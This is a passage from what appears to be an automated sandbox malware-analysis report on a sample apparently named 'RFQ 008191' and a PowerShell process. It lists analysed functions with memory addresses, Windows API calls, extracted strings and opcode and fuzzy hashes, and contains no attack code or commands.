                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CharPrevlstrlen
                                                                    • String ID: C:\Users\user\Desktop
                                                                    • API String ID: 2709904686-3976562730
                                                                    • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                    • Instruction ID: b9e9e75b8ba1df67f9f167ecd7c14c3df7ff164ad8267efb590a8552da577330
                                                                    • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                    • Instruction Fuzzy Hash: 81D0A7B3400930DAC3127718EC04D9F77ACEF1634074A443AE580B7165D7785D8186EC
                                                                    Function 00405F96 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBE
                                                                    • CharNextA.USER32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 190613189-0
                                                                    • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                    • Instruction ID: c3aaa261a9e4bb9915bd58c77e7651ea6c0a11e303954dac61c17192ece284d7
                                                                    • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                    • Instruction Fuzzy Hash: F7F06231105459EFDB029BA5DD00D9EBBA8EF15254B2540BAE840F7250D678DE019B69

                                                                    Executed Functions

                                                                    Function 0760F780 Relevance: 9.1, Strings: 7, Instructions: 318COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q
                                                                    • API String ID: 0-1721289453
                                                                    • Opcode ID: 37e3fe471e0e82666ad971a849f00c34f7d0358f4736f95ef42ff541d9484854
                                                                    • Instruction ID: 9457110185afaa094144305e7efc67472e9e9a70158bdcf3fa2738e24b2363d4
                                                                    • Opcode Fuzzy Hash: 37e3fe471e0e82666ad971a849f00c34f7d0358f4736f95ef42ff541d9484854
                                                                    • Instruction Fuzzy Hash: E8B105B1B0420A9FDB398A7598147EB7BB1AF85210F28806AD846DF3D2DB35DD42C7D1
                                                                    Function 076060E0 Relevance: 8.5, Strings: 6, Instructions: 992COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$4'q$4'q$4'q$tPq$tPq
                                                                    • API String ID: 0-3271992745
                                                                    • Opcode ID: 7c098dbbb6aa3c73a64ce2426c0f9f3183661fb3e54260df55b85337d686a2fd
                                                                    • Instruction ID: acaf5347b1f247ed75fe78d9f425dd622df3785ed582f617660f7a37708d900c
                                                                    • Opcode Fuzzy Hash: 7c098dbbb6aa3c73a64ce2426c0f9f3183661fb3e54260df55b85337d686a2fd
                                                                    • Instruction Fuzzy Hash: B88261B4B002159FE718DF68C850BAABBB2FB85304F14C0A9D90A9F395CB71ED55CB91
                                                                    Function 07602070 Relevance: 5.6, Strings: 4, Instructions: 594COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$4'q$4'q$4'q
                                                                    • API String ID: 0-4210068417
                                                                    • Opcode ID: e04e2fd384b790a14b6f89e4b76b92dbb3aca58956a3ec7c188adf2c96eb46df
                                                                    • Instruction ID: 89b43b7d229cd08a5527f14f20bb1b391d340974ec02118d60cd1dc34cae01ad
                                                                    • Opcode Fuzzy Hash: e04e2fd384b790a14b6f89e4b76b92dbb3aca58956a3ec7c188adf2c96eb46df
                                                                    • Instruction Fuzzy Hash: EA123AB1B043159FD7294BB898287ABBBA2BFC5215F14847AD906CB3D1DB31D842C7D2
                                                                    Function 0760AE66 Relevance: 5.4, Strings: 4, Instructions: 403COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$4'q$4'q$4'q
                                                                    • API String ID: 0-4210068417
                                                                    • Opcode ID: c811590bd254a2c9f162e359691b535cefd4572f1d45ec3a3eb3de1bffdb0ad6
                                                                    • Instruction ID: 05ddea67ee98609f1b6957cf90e2653244ab2e03f4c295fdb7f34fd9f1cebe90
                                                                    • Opcode Fuzzy Hash: c811590bd254a2c9f162e359691b535cefd4572f1d45ec3a3eb3de1bffdb0ad6
                                                                    • Instruction Fuzzy Hash: 7A1220B4A003199FE724CF64C951BDAB7B2FB89304F1081A9D9096B795CB72ED81CF91
                                                                    Function 07607B60 Relevance: 5.4, Strings: 4, Instructions: 373COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$4'q$4'q$4'q
                                                                    • API String ID: 0-4210068417
                                                                    • Opcode ID: e6f1ee2f2217b44ec3ab99122ca1c094590f1accc0e3b598485285e25d55c400
                                                                    • Instruction ID: 8bfefb954b05e9b88f3528ed828f4530f5a58dd8e659ac29c92252c627c90bc6
                                                                    • Opcode Fuzzy Hash: e6f1ee2f2217b44ec3ab99122ca1c094590f1accc0e3b598485285e25d55c400
                                                                    • Instruction Fuzzy Hash: 09E160B4A00205DFEB18DBA4C454BAFBBE2BB89304F54C429D9066F395CB75EC42CB91
                                                                    Function 07603E00 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $q$$q$$q
                                                                    • API String ID: 0-3067366958
                                                                    • Opcode ID: d8304a67b58f8ae3364eb3d3fb36eff55dd672c10209c41ed823bcf9638305dc
                                                                    • Instruction ID: 34c9da0742e3ec20e494c1dc0cbc142172ef6360f366490f952a253c42e53a9c
                                                                    • Opcode Fuzzy Hash: d8304a67b58f8ae3364eb3d3fb36eff55dd672c10209c41ed823bcf9638305dc
                                                                    • Instruction Fuzzy Hash: 61411AF6B002169FDB285A7AD84026BF7E5EF85612B18852FDC06EB381DB31D90187E5
                                                                    Function 07604420 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $q$$q$$q
                                                                    • API String ID: 0-3067366958
                                                                    • Opcode ID: 3135d09e43e37ccf72710a524934a2c730e18166e8b987fd95901bea8c47bcc9
                                                                    • Instruction ID: 10d73b3f7e1ee9bdd68c89023ed940dbb64a11c15df671b90d6a126b26bf899e
                                                                    • Opcode Fuzzy Hash: 3135d09e43e37ccf72710a524934a2c730e18166e8b987fd95901bea8c47bcc9
                                                                    • Instruction Fuzzy Hash: 802149F23103469BEB3C567A9811B377ED6DBC6215F24842AAB07CB3C2CD75D80683A1
                                                                    Function 0760B7F8 Relevance: 3.0, Strings: 2, Instructions: 504COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$4'q
                                                                    • API String ID: 0-1467158625
                                                                    • Opcode ID: 96529a5e58b4f2852aa2c18099d9dad58b3b41092d761ee262f3be6403176c1a
                                                                    • Instruction ID: d4597eca26a5e1d4aacf1c4a71cd2a2a4d56f07f8e77967df499f6546cc76af4
                                                                    • Opcode Fuzzy Hash: 96529a5e58b4f2852aa2c18099d9dad58b3b41092d761ee262f3be6403176c1a
                                                                    • Instruction Fuzzy Hash: D6223FB4A00314AFE714DB68CC51BDABBE2FB89304F118099D9095F792CB72ED42CB95
                                                                    Function 07607B44 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$4'q
                                                                    • API String ID: 0-1467158625
                                                                    • Opcode ID: b97e532cd18923537a64fbe24ee162e75adab420713ef17b5b37a6105f9283e2
                                                                    • Instruction ID: 675f30f1c6fed9a195cc92234d22d18e6c60e3f9bf509c6d733018f551e4ffa9
                                                                    • Opcode Fuzzy Hash: b97e532cd18923537a64fbe24ee162e75adab420713ef17b5b37a6105f9283e2
                                                                    • Instruction Fuzzy Hash: E8C17EB4A00205DFEB18CFA4C450BAEBBB2BB89314F55C169D5066F395CB75F842CB91
                                                                    Function 07607B30 Relevance: 2.8, Strings: 2, Instructions: 272COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$4'q
                                                                    • API String ID: 0-1467158625
                                                                    • Opcode ID: 11a36c193fae1b5dec09b649acdb2e70261b1be5cd62fb32a49817736b18f7d4
                                                                    • Instruction ID: 6b0104d62d8742604612757838362a74d21a4ab14f041d5028f482a99f4971ac
                                                                    • Opcode Fuzzy Hash: 11a36c193fae1b5dec09b649acdb2e70261b1be5cd62fb32a49817736b18f7d4
                                                                    • Instruction Fuzzy Hash: 2CB15DB4A00205DFEB18CBA4C554BAEBBE2BB88304F55C169D5066F395CB76FC42CB91
                                                                    Function 07604400 Relevance: 2.6, Strings: 2, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $q$$q
                                                                    • API String ID: 0-3126353813
                                                                    • Opcode ID: 1c6e7d87f030139628bb549186e186a683b117a819d2379dc47ed0035365b5f1
                                                                    • Instruction ID: 8c3983b17a956372ffefea76a08cdb07547d885c4d49cc2e8be1757937f632f8
                                                                    • Opcode Fuzzy Hash: 1c6e7d87f030139628bb549186e186a683b117a819d2379dc47ed0035365b5f1
                                                                    • Instruction Fuzzy Hash: CA2138F22183C25FEB3A5A3558507633FA5DF83200F198097EA56DB3D3DD658849C3A1
                                                                    Function 07606F0A Relevance: 1.9, Strings: 1, Instructions: 647COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q
                                                                    • API String ID: 0-1807707664
                                                                    • Opcode ID: 1aaad7f2605cec940fe45cf85bba37f893d5f61981ab54f726349779ac93f429
                                                                    • Instruction ID: d66eb78556f7de1a96c443416532868c125f87ba13ea567899d4c632f8667afe
                                                                    • Opcode Fuzzy Hash: 1aaad7f2605cec940fe45cf85bba37f893d5f61981ab54f726349779ac93f429
                                                                    • Instruction Fuzzy Hash: CC522FB4B002159FE764DF58C850B9ABBB2FB84304F15C099DA099F796CB72ED81CB91
                                                                    Function 0760BFEB Relevance: 1.9, Strings: 1, Instructions: 621COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q
                                                                    • API String ID: 0-1807707664
                                                                    • Opcode ID: f981244d3a90feb7f3e17bb772ba8baef6036d98fe72fc586dbb1aa8e222c7a8
                                                                    • Instruction ID: b46a4faf350af248dd9738054e8eab59208b5b276a17c761466973ba2b79b06f
                                                                    • Opcode Fuzzy Hash: f981244d3a90feb7f3e17bb772ba8baef6036d98fe72fc586dbb1aa8e222c7a8
                                                                    • Instruction Fuzzy Hash: A7422FB4A003149FE714DB58CC51BEABBA2FB89304F11C199D9095F792CB72ED82CB91
                                                                    Function 0760702C Relevance: 1.7, Strings: 1, Instructions: 483COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q
                                                                    • API String ID: 0-1807707664
                                                                    • Opcode ID: 75a3c838b1bbab2f82a4a268aaa39b0cfc8926f1c3fde258f57342f21fd38510
                                                                    • Instruction ID: 8b27712791ff3b187b8510de9508c6bb41b11e2fd9437a13331b079a51281d19
                                                                    • Opcode Fuzzy Hash: 75a3c838b1bbab2f82a4a268aaa39b0cfc8926f1c3fde258f57342f21fd38510
                                                                    • Instruction Fuzzy Hash: 94223EB4B002159FE714DF58C890B9ABBB2FB84304F15C099DA099F396CB72ED91CB91
                                                                    Function 0760C0D1 Relevance: 1.7, Strings: 1, Instructions: 469COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q
                                                                    • API String ID: 0-1807707664
                                                                    • Opcode ID: 2e629d5dc8561fac370b45962a2780f65d2a3216be233d3e1957cef6f21a646b
                                                                    • Instruction ID: 54c7ab696fb3dc98a88ab619b3b9c7c873e21d414a96820c93fafc2170ab2ab9
                                                                    • Opcode Fuzzy Hash: 2e629d5dc8561fac370b45962a2780f65d2a3216be233d3e1957cef6f21a646b
                                                                    • Instruction Fuzzy Hash: CE121EB4A00314AFE714DB54CC51B9ABBE2FB89304F518099D9099F792CB72ED82CF95
                                                                    Function 0760F990 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q
                                                                    • API String ID: 0-1807707664
                                                                    • Opcode ID: 7fa2ca01aacc21349d29e8da036f80422da101aee1acd18c5e552a7dfe4a503e
                                                                    • Instruction ID: 928e40fc357a3ad48de40475fda25cc0bdc1a088ea8ed8239b10f0e259697aea
                                                                    • Opcode Fuzzy Hash: 7fa2ca01aacc21349d29e8da036f80422da101aee1acd18c5e552a7dfe4a503e
                                                                    • Instruction Fuzzy Hash: 5D2127F1A00206EFEB789A7588507FB76E1AB85204F244066D906DB3D5DB35C852C7E1
                                                                    Function 076072A4 Relevance: .4, Instructions: 391COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a5896a0f8461930fb1d3858af3ce9027f5a742d0b90b512e58ca8f9e6e30ee52
                                                                    • Instruction ID: 75cb00a0444cb3c1202a37e0fb4f27011cbddc40fbbce1b36d2c66b01d7d11c3
                                                                    • Opcode Fuzzy Hash: a5896a0f8461930fb1d3858af3ce9027f5a742d0b90b512e58ca8f9e6e30ee52
                                                                    • Instruction Fuzzy Hash: F9F12AB4A01204AFEB19CF98D551B9ABBF2BF88305F15C059E9069B3A1C772FD41CB91
                                                                    Function 07604548 Relevance: .4, Instructions: 382COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 05cae48a878d4769b46e763b71bd6e6ae100e84078fb83653d26dc04919d5c91
                                                                    • Instruction ID: 5949efba432291351e02e7fb3edaa9919e14c67849d89f7ff06f352db1237c87
                                                                    • Opcode Fuzzy Hash: 05cae48a878d4769b46e763b71bd6e6ae100e84078fb83653d26dc04919d5c91
                                                                    • Instruction Fuzzy Hash: EBE151B4B012459FD728CB98C550B5ABBF2BF8A305F15C069DA06AB395CB71EC42CB91
                                                                    Function 0760452C Relevance: .4, Instructions: 350COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 622ebe90e3f529f1e3c15ac5a2b2dcaba13505d8c4e449cce626066e5e7ca9ed
                                                                    • Instruction ID: 79d2c73b80bd15df145cc0f3f093ad60175c7f13d60e5f56dea1900d79d6b1e8
                                                                    • Opcode Fuzzy Hash: 622ebe90e3f529f1e3c15ac5a2b2dcaba13505d8c4e449cce626066e5e7ca9ed
                                                                    • Instruction Fuzzy Hash: DFE160B4A012459FD728CF58C550B9ABBF2FF8A314F15C059EA06AB395CB72EC41CB91
                                                                    Function 0760C524 Relevance: .3, Instructions: 333COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ecc0f1a458b28ab455c3c72753408087f7870ea67ee8bc69d484ea388b30a27e
                                                                    • Instruction ID: 860ba9f21ee1ad496abaeaf84e59e5779e92aa3fcb4d6b3920d6865fafa5290a
                                                                    • Opcode Fuzzy Hash: ecc0f1a458b28ab455c3c72753408087f7870ea67ee8bc69d484ea388b30a27e
                                                                    • Instruction Fuzzy Hash: AEE14FB4A102199FEB24CB64CC55BEBB7B2BB85304F108199D50A6B792CB71DD81CFA1
                                                                    Function 04AB731A Relevance: .3, Instructions: 265COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762437700.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_4ab0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e64db1c204e5877418fd3c31a614578629e2ba6957eddb927f11b92c9c47451d
                                                                    • Instruction ID: 0f6b8f4491fb25a148fdbbd3d2b8b10a7310e3567fa119b1966efd3b29e0928a
                                                                    • Opcode Fuzzy Hash: e64db1c204e5877418fd3c31a614578629e2ba6957eddb927f11b92c9c47451d
                                                                    • Instruction Fuzzy Hash: 68A19F39A002089FDB14DFA4D544A9DBBB6FFC8314F218558D806AF365DB74BD89CB80
                                                                    Function 04AB2AA0 Relevance: .2, Instructions: 218COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762437700.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_4ab0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7fc48048f7ec3d8de725b5f5582060353680ccf5b12bb1a10011ef8f2dd7ace0
                                                                    • Instruction ID: bae2143aec461a36a03e01d2e34df25b39c5e27badca0088afad3ecb88e6b615
                                                                    • Opcode Fuzzy Hash: 7fc48048f7ec3d8de725b5f5582060353680ccf5b12bb1a10011ef8f2dd7ace0
                                                                    • Instruction Fuzzy Hash: AF91A074A002458FCB15CF59C498AEAFBB5FF49310B2486AAD855DB3A6C735FC41CBA0
                                                                    Function 04AB7BD6 Relevance: .2, Instructions: 188COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762437700.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_4ab0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c5ea2673091ece68a45fb40794092a53b6f6be0658b2d8e63151a656de5a882
                                                                    • Instruction ID: 040b28a603df4ecc9a09516c8b6e6b6c949a1fd3948530f61f16d6ce0c6e6023
                                                                    • Opcode Fuzzy Hash: 0c5ea2673091ece68a45fb40794092a53b6f6be0658b2d8e63151a656de5a882
                                                                    • Instruction Fuzzy Hash: BF712A34A002089FDB24DFA5D840BEDBBF6BF88344F148429D452AB761DB74AD46CF81
                                                                    Function 04AB7A53 Relevance: .2, Instructions: 166COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762437700.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_4ab0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7cfe226415b4973dc803967213bcf3ef40cf68843c7c94b63715eb38b9126fae
                                                                    • Instruction ID: d4baab53f79d06d8b9a1fd74773fa92190107859394196eeb2f9bfe6b87f0691
                                                                    • Opcode Fuzzy Hash: 7cfe226415b4973dc803967213bcf3ef40cf68843c7c94b63715eb38b9126fae
                                                                    • Instruction Fuzzy Hash: 82617C34A006098FDB24DFA8C884AEDBBF6FF84314F148969D4469B651DB71BD46CB81
                                                                    Function 04ABD638 Relevance: .2, Instructions: 152COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762437700.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_4ab0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4b2363dc9eb5e3a903295fee0b0f0eaa786c16e88584a3972d804eb52bf634df
                                                                    • Instruction ID: 92665bd4e275cb3cce708eaad6b2023c0273c4f20f6a71c44999ede7e93a06e1
                                                                    • Opcode Fuzzy Hash: 4b2363dc9eb5e3a903295fee0b0f0eaa786c16e88584a3972d804eb52bf634df
                                                                    • Instruction Fuzzy Hash: 8151A734A003048FD715DB78D4547EEBBF2EFC9211F18C46ED8459B755CA31AC469BA1
                                                                    Function 04ABA980 Relevance: .1, Instructions: 144COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762437700.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
